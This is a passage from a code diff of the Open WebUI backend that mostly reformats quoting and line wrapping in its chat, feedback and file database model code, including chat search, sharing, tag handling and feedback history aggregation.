average_user_message_content_length: float # average length of user message contents + average_assistant_message_content_length: float # average length of assistant message contents tags: list[str] = [] # tags associated with the chat last_message_at: int # timestamp of the last message updated_at: int created_at: int - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class ChatUsageStatsListResponse(BaseModel): items: list[ChatUsageStatsResponse] total: int - model_config = 
ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class MessageStats(BaseModel): @@ -290,24 +280,20 @@ def _sanitize_chat_row(self, chat_item): return changed - def insert_new_chat( - self, user_id: str, form_data: ChatForm, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def insert_new_chat(self, user_id: str, form_data: ChatForm, db: Optional[Session] = None) -> Optional[ChatModel]: with get_db_context(db) as db: id = str(uuid.uuid4()) chat = ChatModel( **{ - "id": id, - "user_id": user_id, - "title": self._clean_null_bytes( - form_data.chat["title"] - if "title" in form_data.chat - else "New Chat" + 'id': id, + 'user_id': user_id, + 'title': self._clean_null_bytes( + form_data.chat['title'] if 'title' in form_data.chat else 'New Chat' ), - "chat": self._clean_null_bytes(form_data.chat), - "folder_id": form_data.folder_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'chat': self._clean_null_bytes(form_data.chat), + 'folder_id': form_data.folder_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -318,44 +304,34 @@ def insert_new_chat( # Dual-write initial messages to chat_message table try: - history = form_data.chat.get("history", {}) - messages = history.get("messages", {}) + history = form_data.chat.get('history', {}) + messages = history.get('messages', {}) for message_id, message in messages.items(): - if isinstance(message, dict) and message.get("role"): + if isinstance(message, dict) and message.get('role'): ChatMessages.upsert_message( message_id=message_id, chat_id=id, user_id=user_id, data=message, ) except Exception as e: - log.warning( - f"Failed to write initial messages to chat_message table: {e}" - ) + log.warning(f'Failed to write initial messages to chat_message table: {e}') return ChatModel.model_validate(chat_item) if chat_item else None - def _chat_import_form_to_chat_model( - self, user_id: str, form_data: ChatImportForm - ) -> ChatModel: + def _chat_import_form_to_chat_model(self, user_id: str, form_data: ChatImportForm) -> ChatModel: id = str(uuid.uuid4()) chat = ChatModel( **{ - "id": id, - "user_id": user_id, - "title": self._clean_null_bytes( - form_data.chat["title"] if "title" in form_data.chat else "New Chat" - ), - "chat": self._clean_null_bytes(form_data.chat), - "meta": form_data.meta, - "pinned": form_data.pinned, - "folder_id": form_data.folder_id, - "created_at": ( - form_data.created_at if form_data.created_at else int(time.time()) - ), - "updated_at": ( - form_data.updated_at if form_data.updated_at else int(time.time()) - ), + 'id': id, + 'user_id': user_id, + 'title': self._clean_null_bytes(form_data.chat['title'] if 'title' in form_data.chat else 'New Chat'), + 'chat': self._clean_null_bytes(form_data.chat), + 'meta': form_data.meta, + 'pinned': form_data.pinned, + 'folder_id': form_data.folder_id, + 'created_at': (form_data.created_at if form_data.created_at else int(time.time())), + 'updated_at': (form_data.updated_at if form_data.updated_at else int(time.time())), } ) return chat @@ -379,35 +355,27 @@ def import_chats( # Dual-write messages to chat_message table try: for form_data, chat_obj in zip(chat_import_forms, chats): - history = form_data.chat.get("history", {}) - messages = history.get("messages", {}) + history = form_data.chat.get('history', {}) + messages = history.get('messages', {}) for message_id, message in messages.items(): - if isinstance(message, dict) and message.get("role"): + if isinstance(message, dict) and message.get('role'): 
- update_chat_by_id(id, chat, db=None): collapsed signature; the title assignment becomes a one-line conditional falling back to 'New Chat', and updated_at is refreshed before commit.
- update_chat_title_by_id / update_chat_tags_by_id: re-quoted; tag names are normalized with t.replace(' ', '_').lower(), the literal 'none' is filtered out, and meta is replaced in a single assignment ({**chat.meta, 'tags': new_tag_ids}) before commit and refresh.
- get_chat_title_by_id: returns result[0] or 'New Chat'.
- get_messages_map_by_chat_id / get_message_by_id_and_message_id: read from chat.chat['history']['messages'] with empty-dict fallbacks.
- upsert_message_to_chat_by_id_and_message_id(id, message_id, message): string content is passed through sanitize_text_for_db(); an existing message is shallow-merged ({**old, **message}), a new one is inserted, history['currentId'] is set to message_id, and the result is dual-written to chat_message (warning on failure) before update_chat_by_id persists the blob (see the sketch below).
- add_message_status_to_chat_by_id_and_message_id: appends to the message's statusHistory list.
- add_message_files_by_id_and_message_id(id, message_id, files): extends the message's files list, persists via update_chat_by_id, and returns the combined list.
- insert_shared_chat_by_chat_id(chat_id, db=None): if the chat already carries a share_id, the existing shared copy is returned (looked up with user_id 'shared'); otherwise a new Chat row is created with a fresh UUID, user_id f'shared-{chat_id}', the same title/chat/meta/pinned/folder_id/created_at, and updated_at set to now.
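The upsert hunk reduces to a shallow dict merge over the history map. A self-contained sketch of just that merge; the real sanitize_text_for_db is replaced by an illustrative null-byte strip, and setdefault is used where the patch indexes the key directly.

    def sanitize_text_for_db(text: str) -> str:
        # Illustrative stand-in: the real helper strips characters (e.g. NUL)
        # that some database backends reject.
        return text.replace('\x00', '')

    def upsert_history_message(chat: dict, message_id: str, message: dict) -> dict:
        if isinstance(message.get('content'), str):
            message['content'] = sanitize_text_for_db(message['content'])

        history = chat.get('history', {})
        messages = history.setdefault('messages', {})

        if message_id in messages:
            # Shallow merge: incoming keys win, untouched keys survive.
            messages[message_id] = {**messages[message_id], **message}
        else:
            messages[message_id] = message

        history['currentId'] = message_id
        chat['history'] = history
        return chat

    chat = {'history': {'messages': {'m1': {'role': 'user', 'content': 'hi'}}}}
    upsert_history_message(chat, 'm1', {'content': 'hi\x00 there'})
    assert chat['history']['messages']['m1'] == {'role': 'user', 'content': 'hi there'}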
- After the shared copy is inserted, the original row is updated with {'share_id': shared_chat.id} in a single filter_by(id=chat_id).update(...) call.
- update_shared_chat_by_chat_id: looks up the shared copy by user_id f'shared-{chat_id}' and falls back to insert_shared_chat_by_chat_id when none exists.
- delete_shared_chat_by_chat_id: deletes the shared copy's chat_message rows through a scalar subquery on Chat.id (synchronize_session=False), then the shared Chat row itself.
- unarchive_all_chats_by_user_id / archive_all_chats_by_user_id: bulk update({'archived': False}) or update({'archived': True}) per user.
- update_chat_share_id_by_id, toggle_chat_pinned_by_id, toggle_chat_archive_by_id: collapsed signatures only; the toggle logic is unchanged.
- get_archived_chat_list_by_user_id(user_id, filter=None, skip=0, limit=50, db=None): the optional filter dict supports a 'query' key (title ILIKE '%...%') plus 'order_by' and 'direction'. order_by is validated with getattr(Chat, order_by, None) and direction must be 'asc' or 'desc'; anything else raises ValueError('Invalid order_by field') or ValueError('Invalid direction for ordering'). The default ordering is Chat.updated_at.desc() with Chat.id as tiebreaker, and only (id, title, updated_at, created_at) are selected into ChatTitleIdResponse.
- get_shared_chat_list_by_user_id: the same filter and ordering treatment over chats with share_id IS NOT NULL, mapped to SharedChatResponse (id, title, share_id, updated_at, created_at).
- get_chat_list_by_user_id: same treatment again, excluding archived chats by default. A reduced sketch of the ordering validation follows.
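The ordering hunks share one defensive pattern: the client-supplied column name is resolved against the model before it reaches SQL, and anything unexpected raises. A reduced, runnable sketch of that pattern; the two-column model is an illustrative assumption.

    from typing import Optional

    from sqlalchemy import BigInteger, Column, String, select
    from sqlalchemy.orm import declarative_base

    Base = declarative_base()

    class Chat(Base):
        __tablename__ = 'chat'
        id = Column(String, primary_key=True)
        updated_at = Column(BigInteger)

    def apply_ordering(stmt, order_by: Optional[str], direction: Optional[str]):
        # Resolve the column on the model first; unknown names never reach SQL.
        if order_by and direction:
            column = getattr(Chat, order_by, None)
            if column is None:
                raise ValueError('Invalid order_by field')
            if direction.lower() == 'asc':
                return stmt.order_by(column.asc(), Chat.id)
            if direction.lower() == 'desc':
                return stmt.order_by(column.desc(), Chat.id)
            raise ValueError('Invalid direction for ordering')
        # Stable default: newest first, primary key as tiebreaker.
        return stmt.order_by(Chat.updated_at.desc(), Chat.id)

    stmt = apply_ordering(select(Chat.id), 'updated_at', 'asc')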
query = query.filter(Chat.title.ilike(f"%{query_key}%")) + query = query.filter(Chat.title.ilike(f'%{query_key}%')) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') if order_by and direction and getattr(Chat, order_by): - if direction.lower() == "asc": + if direction.lower() == 'asc': query = query.order_by(getattr(Chat, order_by).asc(), Chat.id) - elif direction.lower() == "desc": + elif direction.lower() == 'desc': query = query.order_by(getattr(Chat, order_by).desc(), Chat.id) else: - raise ValueError("Invalid direction for ordering") + raise ValueError('Invalid direction for ordering') else: query = query.order_by(Chat.updated_at.desc(), Chat.id) @@ -907,10 +837,10 @@ def get_chat_title_id_list_by_user_id( return [ ChatTitleIdResponse.model_validate( { - "id": chat[0], - "title": chat[1], - "updated_at": chat[2], - "created_at": chat[3], + 'id': chat[0], + 'title': chat[1], + 'updated_at': chat[2], + 'created_at': chat[3], } ) for chat in all_chats @@ -933,9 +863,7 @@ def get_chat_list_by_chat_ids( ) return [ChatModel.model_validate(chat) for chat in all_chats] - def get_chat_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def get_chat_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat_item = db.get(Chat, id) @@ -950,9 +878,7 @@ def get_chat_by_id( except Exception: return None - def get_chat_by_share_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def get_chat_by_share_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: # it is possible that the shared link was deleted. hence, @@ -966,50 +892,38 @@ def get_chat_by_share_id( except Exception: return None - def get_chat_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def get_chat_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat = db.query(Chat).filter_by(id=id, user_id=user_id).first() return ChatModel.model_validate(chat) except Exception: return None - def is_chat_owner( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def is_chat_owner(self, id: str, user_id: str, db: Optional[Session] = None) -> bool: """ Lightweight ownership check — uses EXISTS subquery instead of loading the full Chat row (which includes the potentially large JSON blob). """ try: with get_db_context(db) as db: - return db.query( - exists().where(and_(Chat.id == id, Chat.user_id == user_id)) - ).scalar() + return db.query(exists().where(and_(Chat.id == id, Chat.user_id == user_id))).scalar() except Exception: return False - def get_chat_folder_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[str]: + def get_chat_folder_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[str]: """ Fetch only the folder_id column for a chat, without loading the full JSON blob. Returns None if chat doesn't exist or doesn't belong to user. 
""" try: with get_db_context(db) as db: - result = ( - db.query(Chat.folder_id).filter_by(id=id, user_id=user_id).first() - ) + result = db.query(Chat.folder_id).filter_by(id=id, user_id=user_id).first() return result[0] if result else None except Exception: return None - def get_chats( - self, skip: int = 0, limit: int = 50, db: Optional[Session] = None - ) -> list[ChatModel]: + def get_chats(self, skip: int = 0, limit: int = 50, db: Optional[Session] = None) -> list[ChatModel]: with get_db_context(db) as db: all_chats = ( db.query(Chat) @@ -1030,22 +944,18 @@ def get_chats_by_user_id( query = db.query(Chat).filter_by(user_id=user_id) if filter: - if filter.get("updated_at"): - query = query.filter(Chat.updated_at > filter.get("updated_at")) + if filter.get('updated_at'): + query = query.filter(Chat.updated_at > filter.get('updated_at')) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') if order_by and direction: if hasattr(Chat, order_by): - if direction.lower() == "asc": - query = query.order_by( - getattr(Chat, order_by).asc(), Chat.id - ) - elif direction.lower() == "desc": - query = query.order_by( - getattr(Chat, order_by).desc(), Chat.id - ) + if direction.lower() == 'asc': + query = query.order_by(getattr(Chat, order_by).asc(), Chat.id) + elif direction.lower() == 'desc': + query = query.order_by(getattr(Chat, order_by).desc(), Chat.id) else: query = query.order_by(Chat.updated_at.desc(), Chat.id) @@ -1063,14 +973,12 @@ def get_chats_by_user_id( return ChatListResponse( **{ - "items": [ChatModel.model_validate(chat) for chat in all_chats], - "total": total, + 'items': [ChatModel.model_validate(chat) for chat in all_chats], + 'total': total, } ) - def get_pinned_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[ChatTitleIdResponse]: + def get_pinned_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[ChatTitleIdResponse]: with get_db_context(db) as db: all_chats = ( db.query(Chat) @@ -1081,24 +989,18 @@ def get_pinned_chats_by_user_id( return [ ChatTitleIdResponse.model_validate( { - "id": chat[0], - "title": chat[1], - "updated_at": chat[2], - "created_at": chat[3], + 'id': chat[0], + 'title': chat[1], + 'updated_at': chat[2], + 'created_at': chat[3], } ) for chat in all_chats ] - def get_archived_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[ChatModel]: + def get_archived_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[ChatModel]: with get_db_context(db) as db: - all_chats = ( - db.query(Chat) - .filter_by(user_id=user_id, archived=True) - .order_by(Chat.updated_at.desc()) - ) + all_chats = db.query(Chat).filter_by(user_id=user_id, archived=True).order_by(Chat.updated_at.desc()) return [ChatModel.model_validate(chat) for chat in all_chats] def get_chats_by_user_id_and_search_text( @@ -1116,61 +1018,53 @@ def get_chats_by_user_id_and_search_text( search_text = sanitize_text_for_db(search_text).lower().strip() if not search_text: - return self.get_chat_list_by_user_id( - user_id, include_archived, filter={}, skip=skip, limit=limit, db=db - ) + return self.get_chat_list_by_user_id(user_id, include_archived, filter={}, skip=skip, limit=limit, db=db) - search_text_words = search_text.split(" ") + search_text_words = search_text.split(' ') # search_text might contain 'tag:tag_name' format so we need to extract the tag_name, split the search_text and remove the tags tag_ids = 
[ - word.replace("tag:", "").replace(" ", "_").lower() - for word in search_text_words - if word.startswith("tag:") + word.replace('tag:', '').replace(' ', '_').lower() for word in search_text_words if word.startswith('tag:') ] # Extract folder names - handle spaces and case insensitivity folders = Folders.search_folders_by_names( user_id, - [ - word.replace("folder:", "") - for word in search_text_words - if word.startswith("folder:") - ], + [word.replace('folder:', '') for word in search_text_words if word.startswith('folder:')], ) folder_ids = [folder.id for folder in folders] is_pinned = None - if "pinned:true" in search_text_words: + if 'pinned:true' in search_text_words: is_pinned = True - elif "pinned:false" in search_text_words: + elif 'pinned:false' in search_text_words: is_pinned = False is_archived = None - if "archived:true" in search_text_words: + if 'archived:true' in search_text_words: is_archived = True - elif "archived:false" in search_text_words: + elif 'archived:false' in search_text_words: is_archived = False is_shared = None - if "shared:true" in search_text_words: + if 'shared:true' in search_text_words: is_shared = True - elif "shared:false" in search_text_words: + elif 'shared:false' in search_text_words: is_shared = False search_text_words = [ word for word in search_text_words if ( - not word.startswith("tag:") - and not word.startswith("folder:") - and not word.startswith("pinned:") - and not word.startswith("archived:") - and not word.startswith("shared:") + not word.startswith('tag:') + and not word.startswith('folder:') + and not word.startswith('pinned:') + and not word.startswith('archived:') + and not word.startswith('shared:') ) ] - search_text = " ".join(search_text_words) + search_text = ' '.join(search_text_words) with get_db_context(db) as db: query = db.query(Chat).filter(Chat.user_id == user_id) @@ -1196,30 +1090,32 @@ def get_chats_by_user_id_and_search_text( # Check if the database dialect is either 'sqlite' or 'postgresql' dialect_name = db.bind.dialect.name - if dialect_name == "sqlite": + if dialect_name == 'sqlite': # SQLite case: using JSON1 extension for JSON searching sqlite_content_sql = ( - "EXISTS (" - " SELECT 1 " + 'EXISTS (' + ' SELECT 1 ' " FROM json_each(Chat.chat, '$.messages') AS message " " WHERE LOWER(message.value->>'content') LIKE '%' || :content_key || '%'" - ")" + ')' ) sqlite_content_clause = text(sqlite_content_sql) query = query.filter( - or_( - Chat.title.ilike(bindparam("title_key")), sqlite_content_clause - ).params(title_key=f"%{search_text}%", content_key=search_text) + or_(Chat.title.ilike(bindparam('title_key')), sqlite_content_clause).params( + title_key=f'%{search_text}%', content_key=search_text + ) ) # Check if there are any tags to filter, it should have all the tags - if "none" in tag_ids: - query = query.filter(text(""" + if 'none' in tag_ids: + query = query.filter( + text(""" NOT EXISTS ( SELECT 1 FROM json_each(Chat.meta, '$.tags') AS tag ) - """)) + """) + ) elif tag_ids: query = query.filter( and_( @@ -1230,13 +1126,13 @@ def get_chats_by_user_id_and_search_text( FROM json_each(Chat.meta, '$.tags') AS tag WHERE tag.value = :tag_id_{tag_idx} ) - """).params(**{f"tag_id_{tag_idx}": tag_id}) + """).params(**{f'tag_id_{tag_idx}': tag_id}) for tag_idx, tag_id in enumerate(tag_ids) ] ) ) - elif dialect_name == "postgresql": + elif dialect_name == 'postgresql': # PostgreSQL doesn't allow null bytes in text. 
- For 'postgresql', the same title and content search is built with JSON-aware SQL; because PostgreSQL rejects null bytes in text, rows whose JSON representation contains \u0000 are filtered out before text extraction is attempted. Tag filtering mirrors the SQLite branch using json_array_elements_text(Chat.meta->'tags'). Any other dialect raises NotImplementedError. Pagination is applied at the SQL level (offset/limit) and the result count is logged. A sketch of the dialect-keyed tag predicate follows.
- get_chats_by_folder_ids_and_user_id: a one-line filter over Chat.folder_id.in_(folder_ids) scoped to the user, excluding pinned and archived chats.
- update_chat_folder_id_by_id_and_user_id: collapsed signature only.
- get_chat_tags_by_id_and_user_id: reads chat.meta['tags'] and resolves the ids through Tags.get_tags_by_ids_and_user_id.
- get_chat_list_by_user_id_and_tag_name(...): normalizes the tag name to an id, then branches on dialect (json_each for SQLite, json_array_elements_text for PostgreSQL), both with a bound :tag_id parameter; other dialects raise NotImplementedError.
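The dialect branch boils down to two equivalent, parameterized EXISTS predicates over a JSON array. A runnable SQLite reduction follows (it assumes a CPython whose bundled SQLite has JSON1 enabled, which is typical of modern builds); the PostgreSQL arm is kept only as the string the patch would emit.

    from sqlalchemy import JSON, Column, String, create_engine, text
    from sqlalchemy.orm import Session, declarative_base

    Base = declarative_base()

    class Chat(Base):
        __tablename__ = 'chat'
        id = Column(String, primary_key=True)
        meta = Column(JSON, server_default='{}')

    # Same predicate, two JSON table-functions; both take a bound :tag_id.
    TAG_PREDICATES = {
        'sqlite': "EXISTS (SELECT 1 FROM json_each(chat.meta, '$.tags') "
                  "WHERE json_each.value = :tag_id)",
        'postgresql': "EXISTS (SELECT 1 FROM json_array_elements_text("
                      "chat.meta->'tags') elem WHERE elem = :tag_id)",
    }

    engine = create_engine('sqlite://')
    Base.metadata.create_all(engine)
    with Session(engine) as db:
        db.add(Chat(id='c1', meta={'tags': ['work']}))
        db.commit()

        predicate = TAG_PREDICATES[db.bind.dialect.name]
        rows = db.query(Chat).filter(text(predicate)).params(tag_id='work').all()
        assert [c.id for c in rows] == ['c1']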
- add_chat_tag_by_id_and_user_id_and_tag_name: normalizes the tag id, calls Tags.ensure_tags_exist first, and rewrites chat.meta only when the id is not already present; the new list is deduplicated via list(set(existing + [tag_id])).
- count_chats_by_tag_name_and_user_id: counts non-archived chats using the same dialect-specific EXISTS predicates.
- delete_orphan_tags_for_user: collapsed signatures; tags no longer referenced by any chat are removed through Tags.delete_tags_by_ids_and_user_id.
- count_chats_by_folder_id_and_user_id: collapsed signature only.
- delete_tag_by_id_and_user_id_and_tag_name: filters the tag id out of chat.meta['tags'] and writes back a deduplicated list.
- delete_all_tags_by_id_and_user_id: resets chat.meta['tags'] to [].
- delete_chat_by_id / delete_chat_by_id_and_user_id: each deletes the chat's chat_message rows first, then the Chat row, returning False on any exception.
- delete_chats_by_user_id: removes the user's shared chats, then deletes chat_message rows through a subquery over the user's chat ids (synchronize_session=False) before deleting the Chat rows themselves (see the reduction below).
- delete_chats_by_user_id_and_folder_id: the same subquery cascade scoped to one folder.
- move_chats_by_user_id_and_folder_id: a single bulk update({'folder_id': new_folder_id}).
- delete_shared_chats_by_user_id: collects the f'shared-{chat.id}' sentinel user ids for the user's chats, deletes the matching chat_message rows via a subquery, then the shared Chat rows.
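The delete hunks all use the same two-step cascade: resolve the victim chat ids as a subquery, bulk-delete dependent rows with synchronize_session=False, then delete the parents. A runnable reduction with two minimal tables standing in for chat and chat_message; the patch uses the same .subquery() / .in_() construct.

    from sqlalchemy import Column, String, create_engine
    from sqlalchemy.orm import Session, declarative_base

    Base = declarative_base()

    class Chat(Base):
        __tablename__ = 'chat'
        id = Column(String, primary_key=True)
        user_id = Column(String)

    class ChatMessage(Base):
        __tablename__ = 'chat_message'
        id = Column(String, primary_key=True)
        chat_id = Column(String)

    def delete_chats_by_user_id(db: Session, user_id: str) -> bool:
        try:
            # Resolve the chat ids once, server-side, instead of loading rows.
            chat_id_subquery = db.query(Chat.id).filter_by(user_id=user_id).subquery()
            # Children first; synchronize_session=False skips reconciling the
            # bulk delete with objects already loaded in this session.
            db.query(ChatMessage).filter(
                ChatMessage.chat_id.in_(chat_id_subquery)
            ).delete(synchronize_session=False)
            db.query(Chat).filter_by(user_id=user_id).delete()
            db.commit()
            return True
        except Exception:
            return False

    engine = create_engine('sqlite://')
    Base.metadata.create_all(engine)
    with Session(engine) as db:
        db.add_all([Chat(id='c1', user_id='u1'),
                    ChatMessage(id='m1', chat_id='c1')])
        db.commit()
        assert delete_chats_by_user_id(db, 'u1')
        assert db.query(ChatMessage).count() == 0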
- insert_chat_files(...): fetches the message's existing file ids, drops empty and duplicate ids (list(set(...)) filtered against the existing set), and bulk-inserts the remaining ChatFile rows with db.add_all before commit.
- get_chat_files_by_chat_id_and_message_id: ordered by ChatFile.created_at ascending.
- delete_chat_file(chat_id, file_id): a one-line filter_by delete, returning False on exception.
- get_shared_chats_by_file_id: joins Chat and ChatFile to collect the shared chats associated with the file_id.
backend/open_webui/models/feedbacks.py +53 −94 modified

The same style migration applies here. Notable hunks:

- Feedback table: __tablename__ = 'feedback' re-quoted.
- RatingData / MetaData / SnapshotData / FeedbackForm: model_config = ConfigDict(extra='allow') re-quoted (RatingData also keeps protected_namespaces=()). UserResponse defaults role to 'pending'.
- insert_new_feedback: re-quoted dict keys ('id', 'user_id', 'version', 'created_at', 'updated_at'); errors are logged with log.exception and None is returned.
- get_feedbacks_by_chat_id(chat_id): filters on the JSON column, Feedback.meta['chat_id'].as_string() == chat_id, ordered by created_at descending.
- get_feedback_items(...): sortable by 'username' (join on User), by the JSON fields 'model_id' and 'rating' via Feedback.data[...].as_string(), or by 'updated_at'. A sketch of the JSON-field filter and sort follows.
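Filtering and ordering on JSON payload fields is the one non-trivial pattern in this file. A runnable sketch using the same as_string() accessor; the reduced schema and the SQLite backend are illustrative assumptions.

    from sqlalchemy import JSON, Column, String, create_engine
    from sqlalchemy.orm import Session, declarative_base

    Base = declarative_base()

    class Feedback(Base):
        __tablename__ = 'feedback'
        id = Column(String, primary_key=True)
        data = Column(JSON, nullable=True)
        meta = Column(JSON, nullable=True)

    engine = create_engine('sqlite://')
    Base.metadata.create_all(engine)
    with Session(engine) as db:
        db.add_all([
            Feedback(id='f1', data={'model_id': 'a', 'rating': 1},
                     meta={'chat_id': 'c1'}),
            Feedback(id='f2', data={'model_id': 'b', 'rating': -1},
                     meta={'chat_id': 'c2'}),
        ])
        db.commit()

        # Filter on a JSON member, compared as text.
        for_chat = (db.query(Feedback)
                      .filter(Feedback.meta['chat_id'].as_string() == 'c1')
                      .all())
        assert [f.id for f in for_chat] == ['f1']

        # Order by a JSON member; note this is a *string* sort, as in the patch.
        ordered = (db.query(Feedback)
                     .order_by(Feedback.data['model_id'].as_string().asc())
                     .all())
        assert [f.id for f in ordered] == ['f1', 'f2']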
- The remaining get_feedback_items hunks only collapse the order_by calls onto single lines; rows are zipped into FeedbackUserResponse(**feedback.model_dump(), user=user) and returned as FeedbackListResponse(items=..., total=...).
- get_all_feedbacks / get_all_feedback_ids: collapsed chains, newest first.
- get_feedbacks_for_leaderboard: fetches only Feedback.id and Feedback.data (excluding snapshot and meta) into LeaderboardFeedbackData.
- get_model_evaluation_history(model_id, days): selects (created_at, data) rows, optionally bounded by a cutoff of now - days * 86400 seconds, then aggregates per-day win/loss counts in a defaultdict keyed by '%Y-%m-%d' dates; rating '1' increments 'won', '-1' increments 'lost', and other ratings or other models are skipped.
- After aggregation, the history is materialized as a dense series of ModelHistoryEntry(date, won, lost): for days == 0 ('all time') the range starts at the model's first feedback date, otherwise at today - (days - 1); days with no feedback are zero-filled (see the reduction below).
- get_feedbacks_by_type / get_feedbacks_by_user_id: collapsed chains, ordered by updated_at descending.
- update_feedback_by_id and the delete_feedback_* methods: collapsed signatures; the user-scoped delete returns False when no matching row exists.
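The zero-filling step is easy to get wrong around range boundaries, so a small standard-library reduction may help; the inline test row is illustrative data, and the dict entries stand in for ModelHistoryEntry.

    from collections import defaultdict
    from datetime import date, datetime, timedelta

    def daily_history(rows: list[tuple[int, dict]], model_id: str, days: int):
        counts = defaultdict(lambda: {'won': 0, 'lost': 0})
        first_date = None

        for created_at, data in rows:
            if not data or data.get('model_id') != model_id:
                continue
            rating = str(data.get('rating', ''))
            if rating not in ('1', '-1'):
                continue
            day = datetime.fromtimestamp(created_at).strftime('%Y-%m-%d')
            counts[day]['won' if rating == '1' else 'lost'] += 1
            if first_date is None or day < first_date:
                first_date = day

        today = date.today()
        if days == 0 and first_date:
            # All time: start from the model's first feedback date.
            start = datetime.strptime(first_date, '%Y-%m-%d').date()
            num_days = (today - start).days + 1
        else:
            start = today - timedelta(days=days - 1)
            num_days = days

        # Dense series: every day in range appears, zero-filled when silent.
        return [
            {'date': d, **counts.get(d, {'won': 0, 'lost': 0})}
            for i in range(num_days)
            for d in [(start + timedelta(days=i)).strftime('%Y-%m-%d')]
        ]

    rows = [(int(datetime.now().timestamp()), {'model_id': 'm', 'rating': 1})]
    history = daily_history(rows, 'm', days=7)
    assert len(history) == 7 and history[-1]['won'] == 1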
backend/open_webui/models/files.py +39 −79 modified

Again largely re-quoting and line collapsing. Notable hunks:

- FileMeta: a @model_validator(mode='before') named sanitize_meta handles malformed legacy metadata: a content_type stored as a list such as ['application/pdf', None] is reduced to its first string element, and any other non-string value is nulled out (see the reduction below).
- FileModelResponse: model_config = ConfigDict(extra='allow'); updated_at stays optional for legacy files.
- FilesTable.insert_new_file: before the FileModel is constructed, form_data's meta is passed through sanitize_metadata() to strip non-JSON-serializable objects (e.g. callable tool functions or MCP client instances coming from middleware); timestamps are set and errors logged.
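The before-validator is a compact example of tolerating dirty legacy rows at the model boundary. A runnable reduction of just that validator, with the field set trimmed to content_type; the logic follows the hunk directly.

    from typing import Optional
    from pydantic import BaseModel, ConfigDict, model_validator

    class FileMeta(BaseModel):
        content_type: Optional[str] = None
        model_config = ConfigDict(extra='allow')

        @model_validator(mode='before')
        @classmethod
        def sanitize_meta(cls, data):
            # Legacy rows sometimes hold ['application/pdf', None] or other
            # non-string junk; normalize before field validation runs.
            if not isinstance(data, dict):
                return data
            content_type = data.get('content_type')
            if isinstance(content_type, list):
                data['content_type'] = next(
                    (item for item in content_type if isinstance(item, str)), None
                )
            elif content_type is not None and not isinstance(content_type, str):
                data['content_type'] = None
            return data

    assert FileMeta(content_type=['application/pdf', None]).content_type == 'application/pdf'
    assert FileMeta(content_type=42).content_type is None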
- get_file_by_id / get_file_by_id_and_user_id / get_file_metadata_by_id / get_files: collapsed signatures and chains; all return None (or an empty list) on failure.
- check_access_by_user_id(id, user_id, permission='write'): returns True only for the file's owner; the hunk keeps the comment that additional access-control logic belongs here.
- get_files_by_ids / get_file_metadatas_by_ids: one-line query chains ordered by File.updated_at descending; the metadata variant selects only (id, hash, meta, created_at, updated_at).
Optional[Session] = None) -> list[FileModel]: with get_db_context(db) as db: - return [ - FileModel.model_validate(file) - for file in db.query(File).filter_by(user_id=user_id).all() - ] + return [FileModel.model_validate(file) for file in db.query(File).filter_by(user_id=user_id).all()] def get_file_list( self, user_id: Optional[str] = None, skip: int = 0, limit: int = 50, db: Optional[Session] = None, - ) -> "FileListResponse": + ) -> 'FileListResponse': with get_db_context(db) as db: query = db.query(File) if user_id: @@ -272,10 +245,7 @@ def get_file_list( items = [ FileModel.model_validate(file) - for file in query.order_by(File.updated_at.desc(), File.id.desc()) - .offset(skip) - .limit(limit) - .all() + for file in query.order_by(File.updated_at.desc(), File.id.desc()).offset(skip).limit(limit).all() ] return FileListResponse(items=items, total=total) @@ -296,17 +266,17 @@ def _glob_to_like_pattern(glob: str) -> str: A SQL LIKE compatible pattern with proper escaping. """ # Escape SQL special characters first, then convert glob wildcards - pattern = glob.replace("\\", "\\\\") - pattern = pattern.replace("%", "\\%") - pattern = pattern.replace("_", "\\_") - pattern = pattern.replace("*", "%") - pattern = pattern.replace("?", "_") + pattern = glob.replace('\\', '\\\\') + pattern = pattern.replace('%', '\\%') + pattern = pattern.replace('_', '\\_') + pattern = pattern.replace('*', '%') + pattern = pattern.replace('?', '_') return pattern def search_files( self, user_id: Optional[str] = None, - filename: str = "*", + filename: str = '*', skip: int = 0, limit: int = 100, db: Optional[Session] = None, @@ -331,15 +301,12 @@ def search_files( query = query.filter_by(user_id=user_id) pattern = self._glob_to_like_pattern(filename) - if pattern != "%": - query = query.filter(File.filename.ilike(pattern, escape="\\")) + if pattern != '%': + query = query.filter(File.filename.ilike(pattern, escape='\\')) return [ FileModel.model_validate(file) - for file in query.order_by(File.created_at.desc(), File.id.desc()) - .offset(skip) - .limit(limit) - .all() + for file in query.order_by(File.created_at.desc(), File.id.desc()).offset(skip).limit(limit).all() ] def update_file_by_id( @@ -362,12 +329,10 @@ def update_file_by_id( db.commit() return FileModel.model_validate(file) except Exception as e: - log.exception(f"Error updating file completely by id: {e}") + log.exception(f'Error updating file completely by id: {e}') return None - def update_file_hash_by_id( - self, id: str, hash: Optional[str], db: Optional[Session] = None - ) -> Optional[FileModel]: + def update_file_hash_by_id(self, id: str, hash: Optional[str], db: Optional[Session] = None) -> Optional[FileModel]: with get_db_context(db) as db: try: file = db.query(File).filter_by(id=id).first() @@ -379,9 +344,7 @@ def update_file_hash_by_id( except Exception: return None - def update_file_data_by_id( - self, 